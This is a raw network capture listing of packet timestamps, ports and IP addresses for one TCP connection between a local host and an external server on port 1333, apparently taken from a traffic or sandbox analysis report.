Sep 28, 2023 06:02:00.260658026 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260688066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260693073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260725975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260729074 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260761976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260766983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260797024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260807037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260833979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260839939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260869026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260875940 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260905027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260911942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260940075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260946035 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260967970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.260981083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.260987043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261004925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261007071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261024952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261024952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261042118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261048079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261059046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261070013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261075974 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261090040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261092901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261109114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261116982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261126995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261141062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261147976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261156082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261168003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261168003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261195898 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261199951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261224985 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261244059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261255980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261276960 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261277914 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261317968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261331081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261365891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261408091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261432886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261445999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261465073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261512995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261549950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261574984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261601925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261610031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261636972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261672974 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261709929 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261719942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261749983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261837959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261872053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.261951923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.261989117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262012959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262048006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262115002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262150049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262212992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262249947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262305975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262339115 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262396097 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262438059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262449980 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262490034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262543917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262578964 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262602091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262644053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262686968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262734890 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262744904 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262785912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262820005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262864113 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262865067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.262907028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.262974024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263016939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263040066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263086081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263123035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263164997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263227940 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263272047 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263286114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263329029 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263345957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263391018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263391972 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263437986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263489962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263533115 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263534069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263576031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263587952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263633966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263637066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263679981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263693094 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263740063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263773918 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263797045 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263818979 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263833046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263914108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.263957024 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.263989925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264033079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264164925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264209986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264271975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264318943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264333010 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264375925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264442921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264487028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264529943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264575005 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264580011 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264621973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264662027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264708042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264734983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264777899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264787912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.264832020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.264997959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265052080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265078068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265121937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265160084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265208006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265245914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265292883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265367031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265412092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265414000 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265451908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265455961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265497923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265523911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265568972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265575886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265605927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265623093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265650034 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265661955 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265705109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265722036 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265765905 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265793085 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265836954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265845060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265860081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265883923 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265904903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.265933990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265959024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.265973091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266000032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266020060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266057968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266084909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266124010 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266153097 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266194105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266221046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266258001 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266272068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266308069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266360998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266403913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266412973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266453028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266469002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266510010 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266527891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266561985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266565084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266604900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266623974 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266660929 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266690016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266721964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266729116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266760111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266783953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266823053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266834021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266879082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266895056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266937971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.266954899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.266997099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267024040 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267050982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267067909 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267091990 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267184973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267227888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267231941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267271996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267277002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267321110 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267360926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267407894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267452002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267493963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267517090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267555952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267560005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267597914 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267627001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267652988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267667055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267693996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267714977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267755032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267772913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267811060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267841101 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267879009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267884016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267920971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267937899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.267973900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.267978907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268019915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268045902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268070936 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268084049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268111944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268147945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268186092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268204927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268220901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268244028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268260956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268284082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268321991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268369913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268409014 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268450022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268488884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268508911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268553019 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268563032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268606901 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268615007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268660069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268665075 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268707991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268734932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268779039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268817902 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268861055 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268862963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268902063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268903017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268945932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.268954992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.268995047 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269033909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269078016 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269108057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269150019 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269179106 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269224882 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269253969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269299984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269341946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269386053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269454002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269499063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269521952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269547939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269567013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269593954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269615889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269663095 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269668102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269710064 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269717932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269761086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269771099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269813061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269826889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269870043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269891977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269921064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.269939899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.269958019 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270020962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270066023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270068884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270112038 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270169973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270211935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270232916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270281076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270359039 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270409107 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270443916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270488977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270545006 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270558119 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270587921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270603895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270627975 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270678043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270683050 CEST	1333	49810	116.202.2.169	192.168.2.3
